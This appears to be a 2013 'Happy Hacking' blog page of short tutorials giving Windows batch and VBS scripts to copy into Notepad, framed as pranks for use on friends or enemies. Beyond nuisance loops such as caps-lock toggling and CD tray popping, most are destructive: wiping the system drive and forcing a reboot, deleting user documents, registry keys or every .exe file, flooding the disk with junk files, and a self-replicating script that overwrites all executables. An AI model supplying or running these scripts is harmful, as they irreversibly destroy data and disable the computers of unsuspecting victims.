@echo off
::-----Delete My Music-------::
del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
::---------------------------::
Save As batch.bat
Happy Hacking...
Sunday, 19 May 2013
Delete all documents
@echo off
::----Delete My Documents----::
del /f /q "C:\Users\%userprofile%\My Documents\*.*"
::---------------------------::
Save As batch.bat...
Saturday, 4 May 2013
Tutorial Destroy Anyone's Computer With This File
What the file will do ?
The file we are going to create will reboot the computer once and also
delete all the file needed by the computer to restart again, so you got
it right well if you are pranking with your friend or your enemy
remember that his or her computer will never restart unless new...
The Blue Screen Of Death PC and Laptop

What will this file do ?
It will appear the blue screen of death in windows and then the computer will shutdown.
Method :
1. Open Notepad and copy the code given below.
Code:
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
2. Save as "Anything.bat" (Without quotes &...
Tutorial Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT YOUR OWN RISK]
What will this VBS file do ?
This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM).
Method :
1. Open Notepad and copy the code given below
Code:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your...
Stupidity Shutdown
What will the file do ?
This pops up a funny message then will shutdown the computer
Method :
1. Open Notepad and copy the code given below.
Code:
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10
2. Save as "Anything.bat" (Without...
Tutorial Crazy Caps Lock

What will this file do ?
This constantly turns caps lock on and off really fast continuously.
Method :
1. Open Notepad and copy the code given below.
Code:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
2. Save as "Anything.vbs"...
Tutorial Endless Backspace
What will this file do ?
This makes it so the backspace key is constantly being pressed.
Method :
1. Open Notepad and copy the code given below.
Code:
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
2....
Popping CD Drives
Popping CD Drives
What will this file do ?
This will make the CD drives constantly pop out.
Method :
1. Open Notepad and copy the code given below.
------------------------------------------------------------
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if...
How To Kill Explorer.exe Using Batch File
Method :
1. Open Notepad
2. Type the code given below
Code:
@echo off
taskkill /f /IM explorer.exe
3. Save as "Anything.bat" (Without quotes...
Colorful animation Batch files

Colorful animation Batch files
This code show the text you write and keeps changing it's color randomly.
Change the text to your own text or ascii art.
Code
@echo off
cls
echo.
echo.
echo.
echo .########..########....#####...##.....##.##....##
echo .##.....##.##.....##..##...##...##...##...##..##.
echo .##.....##.##.....##.##.....##...##.##.....####..
echo .########..########..##.....##....###.......##...
echo .##........##...##...##.....##...##.##......##...
echo .##........##....##...##...##...##...##.....##...
echo .##........##.....##...#####...##.....##....##...
:colors...
Delete All .EXE Files On The Computer
Method :
1. Open Notepad
2. Copy the code given below
Code:
@ echo off
rem ---------------------------------
rem Delete All Exe
DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
rem ---------------------------------
3....
Tutorial SPAM Local Disk
Method :
1. Open Notepad
2. Copy the code given below
Code:
@ echo off
rem ---------------------------------
rem Spam Local Disk
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random%...
Infect All .exe Files In The Computer
Method :
1. Open Notepad
2. Copy the code given below
Code:
@ echo off
rem ---------------------------------
rem Infect All .Exe Files
assoc .exe=batfile
DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy /y %0 "%%j:%%k"
rem...